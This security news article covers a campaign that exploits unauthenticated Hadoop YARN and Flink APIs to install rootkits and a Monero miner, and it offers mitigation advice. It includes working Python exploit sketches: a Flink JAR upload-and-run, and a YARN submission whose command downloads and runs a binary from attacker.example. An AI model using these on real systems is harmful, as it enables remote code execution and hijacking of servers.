Attackers deploy rootkits on misconfigured Apache Hadoop and Flink servers

Researchers have discovered a new malware attack campaign that exploits misconfigurations in Apache Hadoop and Flink, two technologies for processing big data sets and data streams. The attackers behind the campaign exploit these issues without authentication to deploy rootkits on the underlying systems and then install a Monero cryptocurrency mining program.

“This attack is particularly intriguing due to the attacker’s use of packers and rootkits to conceal their malware,” researchers from Aqua Security said in a report. “The simplicity with which these techniques are employed presents a significant challenge to traditional security defenses.”

The attackers took advantage of a misconfiguration in the ResourceManager component of Hadoop YARN that allows unauthenticated users to send API requests to deploy new applications. Hadoop YARN (Yet Another Resource Negotiator) is the Hadoop component that separates resource management and application job scheduling from the data processing layer. Hadoop itself is an open-source framework that allows large data sets to be distributed and processed across clusters of computers and is a common tool for data scientists.

“The YARN permits unauthenticated users to create and run applications. This misconfiguration can be exploited by an unauthenticated, remote attacker through a specially designed HTTP request, potentially leading to the execution of arbitrary code, depending on the privileges of the user on the node where the code is executed,” the researchers said.
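
Checking for this exposure is straightforward. Below is a minimal probe sketch in Python against YARN's documented Cluster New Application API, which hands out an application ID to anyone when no authentication is configured; the hostname is hypothetical.

```python
# Minimal exposure probe: a successful response containing an application ID
# means the ResourceManager accepts unauthenticated application submissions.
# The hostname is hypothetical; 8088 is the default RM web/REST port.
import requests

RM = "http://hadoop-rm.example.internal:8088"

resp = requests.post(
    f"{RM}/ws/v1/cluster/apps/new-application",
    headers={"Accept": "application/json"},
    timeout=5,
)
resp.raise_for_status()
app = resp.json()
print("Exposed: received application ID", app["application-id"])
```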

This issue is not new and has been exploited before by attackers to compromise Hadoop clusters, for example in campaigns last year by a group dubbed TeamTNT that specializes in attacking cloud-native technologies including Kubernetes clusters, Docker APIs, Weave Scope instances, JupyterLab and Jupyter Notebook deployments, and Redis servers.

The attackers behind the new campaign observed by Aqua also targeted Apache Flink, an open-source framework for stream and batch processing, through a different insecure configuration in its file upload mechanism, which allows unauthenticated attackers to upload rogue JAR (Java Archive) files to the server. As in the case of Hadoop, this can lead to remote code execution on the server.
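
The Flink exposure follows the same pattern. Here is a rough sketch of how such an upload could be tested in a lab, assuming Flink's REST API is reachable on its default port 8081; the host and JAR name are hypothetical, while /jars/upload and /jars/<id>/run are standard Flink REST routes.

```python
# Lab-only sketch: upload a JAR to an exposed Flink JobManager and run it.
# Host and payload.jar are hypothetical; a hardened deployment should
# reject the unauthenticated upload.
import requests

FLINK = "http://flink-jm.example.internal:8081"

with open("payload.jar", "rb") as f:
    up = requests.post(
        f"{FLINK}/jars/upload",
        files={"jarfile": ("payload.jar", f, "application/x-java-archive")},
        timeout=10,
    )
up.raise_for_status()
# Flink returns the stored path; the JAR ID is its basename.
jar_id = up.json()["filename"].rsplit("/", 1)[-1]

# Running the JAR executes its entry class on the server.
run = requests.post(f"{FLINK}/jars/{jar_id}/run", timeout=10)
print(run.status_code, run.text)
```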

From rootkits to cryptomining

In the attack chain against Hadoop, the attackers first exploit the misconfiguration to create a new application on the cluster and allocate computing resources to it. In the application container configuration, they place a series of shell commands that use the curl command-line tool to download a binary called “dca” from an attacker-controlled server into the /tmp directory and then execute it. A subsequent request to Hadoop YARN executes the newly deployed application and, with it, the shell commands.
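
For illustration, here is a sketch of what that submission step could look like via YARN's Cluster Applications API, intended only for reproducing the pattern in a honeypot or lab. The dca name and /tmp path come from the report; the application ID, application name, and attacker host are hypothetical.

```python
# Lab-only sketch of the submission step described above. The container
# command is the attacker's shell one-liner: download dca to /tmp and run it.
import requests

RM = "http://hadoop-rm.example.internal:8088"   # hypothetical target
APP_ID = "application_1700000000000_0001"       # from the new-application call

payload = {
    "application-id": APP_ID,
    "application-name": "wordcount",            # innocuous-looking name
    "application-type": "YARN",
    "am-container-spec": {
        "commands": {
            "command": "curl -o /tmp/dca http://attacker.example/dca"
                       " && chmod +x /tmp/dca && /tmp/dca"
        }
    },
}

r = requests.post(
    f"{RM}/ws/v1/cluster/apps",
    json=payload,
    headers={"Accept": "application/json"},
    timeout=10,
)
print(r.status_code)  # 202 Accepted means YARN queued the application
```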

Dca is a Linux-native ELF binary that serves as a malware downloader. Its primary purpose is to download and install two rootkits and to drop another binary, called tmp, on disk. It also sets up a crontab job that executes a script called dca.sh to ensure persistence on the system. The tmp binary bundled into dca is a Monero cryptocurrency mining program, while the two rootkits, called initrc.so and pthread.so, are used to hide the dca.sh script and the tmp file on disk.
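
Defenders can triage a suspect node against these indicators. A lightweight sketch follows; note that the /etc/ld.so.preload check is an assumption, since LD_PRELOAD is a common loading point for userland rootkits of this kind but the report only names the two files, and the dca.sh location is hypothetical.

```python
# Lightweight triage sketch based on the indicators named in the report.
# A readdir()-hooking rootkit hides files from directory listings, but
# stat'ing known paths directly may still succeed, depending on which
# libc calls are hooked.
import os
import subprocess

# /tmp/dca comes from the report; /tmp/dca.sh is an assumed location.
SUSPECT_PATHS = ["/tmp/dca", "/tmp/dca.sh", "/etc/ld.so.preload"]

for path in SUSPECT_PATHS:
    if os.path.exists(path):
        print(f"[!] found {path}")

# Crontab persistence: the downloader schedules dca.sh via cron.
try:
    cron = subprocess.run(["crontab", "-l"], capture_output=True, text=True)
    if "dca" in cron.stdout:
        print("[!] crontab entry referencing dca")
except FileNotFoundError:
    pass
```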

The IP address that was used to target Aqua’s Hadoop honeypot was also used to target Flink, Redis, and Spring Framework honeypots (via CVE-2022-22965). This suggests the Hadoop attacks are likely part of a larger operation targeting different technologies, as with TeamTNT’s operations in the past. When probed via Shodan, the IP address appeared to host a web server with a Java interface named Stage, likely part of the Java payload implementation from the Metasploit Framework.

“To mitigate vulnerabilities in Apache Flink and Hadoop ResourceManager, specific strategies need to be implemented,” Assaf Morag, a security researcher at Aqua Security, tells CSO via email. “For Apache Flink, it’s crucial to secure the file upload mechanism. This involves restricting the file upload functionality to authenticated and authorized users and implementing checks on the types of files being uploaded to ensure they are legitimate and safe. Measures like file size limits and file type restrictions can be particularly effective.”

Meanwhile, Hadoop ResourceManager needs authentication and authorization configured for API access. Possible options include integration with Kerberos, a common choice for Hadoop environments, or with LDAP or other supported enterprise authentication systems.
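
Hadoop daemons expose their effective configuration at a /conf endpoint, which makes it possible to audit these settings remotely. A sketch, with a hypothetical hostname, that checks a few of the relevant properties:

```python
# Audit sketch: fetch the ResourceManager's effective configuration and
# flag settings that leave the REST API unauthenticated. The hostname is
# hypothetical; /conf is the standard Hadoop configuration servlet.
import requests
import xml.etree.ElementTree as ET

RM = "http://hadoop-rm.example.internal:8088"

WANTED = {
    "hadoop.security.authentication": "kerberos",  # "simple" means no auth
    "hadoop.security.authorization": "true",
    "yarn.acl.enable": "true",
}

conf = ET.fromstring(requests.get(f"{RM}/conf", timeout=5).text)
values = {p.findtext("name"): p.findtext("value") for p in conf.iter("property")}

for key, expected in WANTED.items():
    actual = values.get(key, "<unset>")
    status = "OK " if actual == expected else "BAD"
    print(f"[{status}] {key} = {actual} (want {expected})")
```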

“Additionally, setting up access control lists (ACLs) or integrating with role-based access control (RBAC) systems can be effective for authorization configuration, a feature natively supported by Hadoop for various services and operations,” Morag says. Deploying agent-based security solutions for containers is also recommended, as these monitor the environment and can detect cryptominers, rootkits, obfuscated or packed binaries, and other suspicious runtime behaviors.
